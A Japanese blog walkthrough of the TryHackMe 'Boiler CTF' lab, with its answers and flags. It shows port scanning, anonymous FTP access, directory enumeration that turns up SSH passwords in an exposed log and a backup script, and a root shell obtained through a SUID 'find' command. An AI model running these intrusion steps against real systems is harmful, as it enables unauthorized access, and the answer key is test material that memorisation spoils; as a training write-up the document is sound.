【TryHackMe】Boiler CTF：Walkthrough

Posted at 2024-10-14

概要

TryHackMe「Boiler CTF」のWalkthroughです。

Task1

Q1.File extension after anon login

ポートスキャンを実行します。

$ nmap -Pn -T4 -sVC -A --min-rate 5000 -p- 10.10.129.124 -oN nmap_result
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.55.144
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry 
|_/
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)

ポートの稼働状況が分かりました。

ポート	サービス	バージョン
21	ftp	vsftpd 3.0.3
80	http	Apache httpd 2.4.18
10000	http	MiniServ 1.930
55007	ssh	OpenSSH 7.2p2

FTPにAnonymousログインできるので接続し、ファイルを探索します。

$ ftp 10.10.129.124
Connected to 10.10.129.124.
220 (vsFTPd 3.0.3)
Name (10.10.129.124:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||49155|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21  2019 .info.txt

A.txt

Q2.What is on the highest port?

A.ssh

Q3.What's running on port 10000?

A.webmin

Q4.Can you exploit the service running on that port? (yay/nay answer)

A.nay

Q5.What's CMS can you access?

80番ポートのディレクトリスキャンをします。

$ dirsearch -u http://10.10.129.124
[04:55:53] 301 -  315B  - /joomla  ->  http://10.10.129.124/joomla/
[04:55:53] 301 -  329B  - /joomla/administrator  ->  http://10.10.129.124/joomla/administrator/
[04:55:59] 301 -  315B  - /manual  ->  http://10.10.129.124/manual/
[04:56:00] 200 -  201B  - /manual/index.html
[04:56:01] 200 -    4KB - /joomla/
[04:56:20] 200 -  178B  - /robots.txt

joomla CMSが使用されています。

A.joomla

Q7.The interesting file name in the folder?

さらにディレクトリ列挙をします。

$ dirsearch -r -u http://10.10.144.242/joomla
[07:12:16] 200 -  301B  - /joomla/_test/log.txt

/joomla/_test/log.txtを発見し、SSHの認証情報を入手できました。

$ curl http://10.10.144.242/joomla/_test/log.txt
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.

A.log.txt

Task2

Q1.Where was the other users pass stored(no extension, just the name)?

Username: basterd,Password: superduperp@$$でSSH接続に成功しました。

$ ssh -p 55007 basterd@10.10.144.242
$ whoami
basterd

/home/basterd/backup.shからstonerユーザーのパスワードを発見しました。

/home/basterd/backup.sh

REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log
 
DATE=`date +%y\.%m\.%d\.`

USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE


if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
             echo "Begining copy of" $i  >> $LOG
             scp  $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
             echo $i "completed" >> $LOG

                if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
                    rm $SOURCE/$i
                    echo $i "removed" >> $LOG
                    echo "####################" >> $LOG
                                else
                                        echo "Copy not complete" >> $LOG
                                        exit 0
                fi 
    done
     

else

    echo "Directory is not present" >> $LOG
    exit 0
fi

A.backup

Q2.user.txt

stonerアカウントに昇格し、/home/stoner.secretからフラグを入手できます。

You made it till here, well done.

A.You made it till here, well done.

Q3.What did you exploit to get the privileged user?

SUIDの検索をします。

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/find

/usr/bin/findを発見し、GTFOBinsで権限昇格のテクニックを発見しました。

A.find

Q4.root.txt

/usr/bin/findを使用してroot権限を取得できました。

$ /usr/bin/find . -exec /bin/sh -p \; -quit
# whoami
root

/root/root.txtからルートフラグを入手できます。

/root/root.txt

It wasn't that hard, was it?

A.It wasn't that hard, was it?

You get articles that match your needs
You can efficiently read back useful information
You can use dark theme

What you can do with signing up